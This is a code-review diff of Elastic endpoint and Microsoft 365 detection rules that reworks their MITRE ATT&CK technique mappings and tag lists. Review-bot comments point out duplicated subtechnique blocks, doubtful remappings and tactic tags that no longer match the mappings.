@@ -83,18 +83,24 @@ library where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml index 62320b4e83b..79332fc5371 100644 --- a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml +++ b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -40,18 +40,24 @@ sequence by user.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [[rule.threat.technique.subtechnique]] -id = "T1127.002" -name = "ClickOnce" -reference = "https://attack.mitre.org/techniques/T1127/002/" +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + 
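Review bot: The added `[[rule.threat.technique.subtechnique]]` block for T1574.001 duplicates the identical block that already follows it, leaving the T1574 technique with two DLL subtechnique entries. The same duplicate is added to rules_building_block/defense_evasion_masquerading_windows_dll.toml later in this patch. Drop the added copy in both files so each technique lists `T1574.001` once.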
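Review bot: In the dotnet_clickonce_dfsvc_netcon hunk the T1127.002 ClickOnce subtechnique is replaced by a new T1218 / T1218.011 Rundll32 technique, while the parent T1127 entry is kept with no subtechnique. Judging only by the filename and the retained T1127 parent, ClickOnce still looks like the relevant subtechnique and Rundll32 does not obviously follow from a dfsvc network-connection rule, so please confirm the remapping is intentional rather than an artifact of the bulk update. If it is not, restoring the three `T1127.002` lines under T1127 and dropping the T1218 block is the smaller change.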
diff --git a/rules_building_block/defense_evasion_download_susp_extension.toml b/rules_building_block/defense_evasion_download_susp_extension.toml index 79afd7ac201..0e65e8b4c34 100644 --- a/rules_building_block/defense_evasion_download_susp_extension.toml +++ b/rules_building_block/defense_evasion_download_susp_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -24,7 +24,14 @@ references = [ risk_score = 21 rule_id = "8d366588-cbd6-43ba-95b4-0971c3f906e5" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" 
@@ -54,18 +61,36 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml index b530926ee0b..2eecbdb9c35 100644 --- a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml +++ b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] 
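Review bot: The new TA0001 Initial Access entry (T1566 with T1566.001 and T1566.002) adds a second tactic to this rule, but the `tags` rewrite in the earlier hunk of this file lists only `Tactic: Defense Evasion` (replacing the old `Tactic: Execution`), so `Tactic: Initial Access` is missing from the tags. The tactic-to-tag consistency check added in this series would flag it. Add `"Tactic: Initial Access",` to the tag list, or drop the Initial Access entry if Defense Evasion alone is intended.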
@@ -78,36 +78,26 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/defense_evasion_generic_deletion.toml b/rules_building_block/defense_evasion_generic_deletion.toml index 56910a2be3a..ba036559b71 100644 --- a/rules_building_block/defense_evasion_generic_deletion.toml +++ b/rules_building_block/defense_evasion_generic_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] 
@@ -54,23 +54,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" - [[rule.threat.technique.subtechnique]] id = "T1070.004" name = "File Deletion" reference = "https://attack.mitre.org/techniques/T1070/004/" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/defense_evasion_injection_from_msoffice.toml b/rules_building_block/defense_evasion_injection_from_msoffice.toml index 563b76b541a..6d1c96172e8 100644 --- a/rules_building_block/defense_evasion_injection_from_msoffice.toml +++ b/rules_building_block/defense_evasion_injection_from_msoffice.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -21,7 +21,16 @@ name = "Potential Process Injection from Malicious Document" risk_score = 21 rule_id = "1c5a04ae-d034-41bf-b0d8-96439b5cc774" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Tactic: Initial Access", + "Rule Type: BBR", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" 
@@ -43,23 +52,43 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules_building_block/defense_evasion_masquerading_browsers.toml b/rules_building_block/defense_evasion_masquerading_browsers.toml index c86c12b0ea8..cb67a25bd91 100644 --- a/rules_building_block/defense_evasion_masquerading_browsers.toml +++ b/rules_building_block/defense_evasion_masquerading_browsers.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [rule] author = ["Elastic"] @@ -21,7 +21,15 @@ name = "Potential Masquerading as Browser Process" risk_score = 21 rule_id = "5b9eb30f-87d6-45f4-9289-2bf2024f0376" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Defense Evasion", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -161,12 +169,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -177,7 +183,22 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_masquerading_vlc_dll.toml b/rules_building_block/defense_evasion_masquerading_vlc_dll.toml index 9afa0bc4d07..a05035ab822 100644 --- a/rules_building_block/defense_evasion_masquerading_vlc_dll.toml +++ b/rules_building_block/defense_evasion_masquerading_vlc_dll.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/05" [rule] author = ["Elastic"] @@ -21,7 +21,15 @@ name = "Potential Masquerading as VLC DLL" risk_score = 21 rule_id = "4494c14f-5ff8-4ed2-8e99-bf816a1642fc" severity = "low" -tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -37,12 +45,10 @@ library where host.os.type == "windows" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -53,7 +59,22 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_masquerading_windows_dll.toml b/rules_building_block/defense_evasion_masquerading_windows_dll.toml index d237951b5e4..afce0c6f8cd 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_dll.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_dll.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/01" [rule] author = ["Elastic"] @@ -21,7 +21,15 @@ name = "Potential Masquerading as System32 DLL" risk_score = 21 rule_id = "fb01d790-9f74-4e76-97dd-b4b0f7bf6435" severity = "low" -tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -100,12 +108,10 @@ library where event.action == "load" and dll.Ext.relative_file_creation_time <= [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" 
@@ -116,17 +122,37 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml index a27af3e29e5..884c457808b 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/05" [rule] author = ["Elastic"] 
@@ -20,7 +20,15 @@ name = "Potential Masquerading as System32 Executable" risk_score = 21 rule_id = "79ce2c96-72f7-44f9-88ef-60fa1ac2ce47" severity = "low" -tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -74,12 +82,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -90,7 +96,22 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml index ee7da379d9e..eb6a59b0199 100644 --- a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml +++ b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -31,7 +31,18 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Purview", "Use Case: Threat Detection", "Use Case: Configuration Auditing", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Data Source: Microsoft Purview", + "Use Case: Threat Detection", + "Use Case: Configuration Auditing", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" 
@@ -43,54 +54,30 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml index 51ce78a36d2..6c94369c5a7 100644 --- a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml +++ b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
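Review bot: The retained T1098 "Account Manipulation" entry under TA0003 loses its `T1098.003` "Additional Cloud Roles" sub-technique at the same time the duplicate Privilege Escalation copy is deleted; for a rule named around Microsoft 365 admin activity the sub-technique was the more specific mapping, so confirm the drop is deliberate rather than a side effect of collapsing the two entries. If the goal was only to remove the TA0004 duplicate, keeping the `[[rule.threat.technique.subtechnique]]` block for T1098.003 under the remaining TA0003 entry preserves the previous coverage.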
@@ -27,7 +27,16 @@ references = ["https://irsl.medium.com/the-trouble-with-microsofts-troubleshoote risk_score = 21 rule_id = "808291d3-e918-4a3a-86cd-73052a0c9bdc" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -50,31 +59,14 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_outlook_suspicious_child.toml b/rules_building_block/defense_evasion_outlook_suspicious_child.toml index 1c1aa8ae3d2..a081138d5d5 100644 --- a/rules_building_block/defense_evasion_outlook_suspicious_child.toml +++ b/rules_building_block/defense_evasion_outlook_suspicious_child.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/01/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [rule] author = ["Elastic"] @@ -20,7 +20,15 @@ name = "Suspicious Outlook Child Process" risk_score = 21 rule_id = "6cf17149-a8e3-44ec-9ec9-fdc8535547a1" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" 
@@ -64,13 +72,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.001" +name = "Invalid Code Signature" +reference = "https://attack.mitre.org/techniques/T1036/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml index 05aa2a61ba6..88639b9b669 100644 --- a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml +++ b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
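Review bot: The replacement threat block for "Suspicious Outlook Child Process" (T1036 with T1036.001 "Invalid Code Signature" and T1036.005, T1055, plus a second entry with T1554 under Persistence) is byte-identical to the block added to the Masquerading-as-System32 rule earlier in this diff, which makes it look like a copied template rather than a mapping derived from this rule's query. An unsigned Outlook child could plausibly fit T1036.001, but T1036.005 and T1554 "Compromise Host Software Binary" assert behaviors the hunk gives no sign of this rule detecting; trim to the techniques the query actually evidences, or explain in the PR why all of them apply. The removed Execution mapping (T1203) is at least consistent with the `"Tactic: Execution"` tag dropped in the hunk above.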
@@ -174,21 +174,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/defense_evasion_powershell_clear_logs_script.toml b/rules_building_block/defense_evasion_powershell_clear_logs_script.toml index f38adcbf777..c008bcb22fd 100644 --- a/rules_building_block/defense_evasion_powershell_clear_logs_script.toml +++ b/rules_building_block/defense_evasion_powershell_clear_logs_script.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
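Review bot: T1027.010 "Command Obfuscation" is removed from the PowerShell special-character obfuscation rule in favor of the parent T1027 plus T1140, even though T1027.010 is the sub-technique that names exactly what this rule measures; confirm the loss of precision is intended. Separately, this hunk adds a second `[[rule.threat]]` entry under TA0002 Execution, but no `tags` hunk for this file appears in the diff, so unless `"Tactic: Execution"` was already present the tags and threat mapping now disagree — the same applies to the clear-logs script rule (Execution) and the service-disabled-registry rule (Impact) below. A tag/tactic consistency check would report each of those as a missing `Tactic:` tag.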
@@ -143,21 +143,39 @@ value = "?:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Se [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" - [[rule.threat.technique.subtechnique]] id = "T1070.001" name = "Clear Windows Event Logs" reference = "https://attack.mitre.org/techniques/T1070/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/defense_evasion_service_disabled_registry.toml b/rules_building_block/defense_evasion_service_disabled_registry.toml index cc41fc4c9ba..c1f1d49dab7 100644 --- a/rules_building_block/defense_evasion_service_disabled_registry.toml +++ 